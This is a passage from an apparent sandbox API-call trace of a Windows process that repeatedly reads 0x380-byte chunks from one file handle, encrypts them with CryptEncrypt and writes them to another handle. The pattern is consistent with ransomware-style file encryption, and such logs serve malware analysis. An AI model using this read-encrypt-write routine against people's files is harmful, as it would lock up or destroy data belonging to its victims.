lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.445] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.445] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.445] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.445] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.445] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.446] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.446] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.446] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.446] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.446] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.446] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.446] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.446] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.446] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.446] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.446] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.446] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.446] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.446] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.447] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.447] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.447] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.447] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.447] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.447] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.447] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.447] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.447] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.447] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.447] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.447] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.447] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.448] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.448] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.448] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.448] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.448] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.448] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.448] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.448] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.448] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.448] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.448] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.448] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.448] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.449] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.449] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.449] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.449] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.449] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.449] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.449] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.449] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.449] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.449] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.449] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.449] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.449] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.449] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.450] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.450] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.450] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.450] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.450] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.450] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.450] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.450] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.450] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.450] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.450] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.450] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.451] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.451] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.451] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.451] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.451] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.451] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.451] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.451] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.451] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.451] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.451] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.451] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.452] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.452] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.452] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.452] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.452] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.452] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.452] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.452] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.452] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.452] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.452] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.452] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.452] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.453] CryptEncrypt (in: 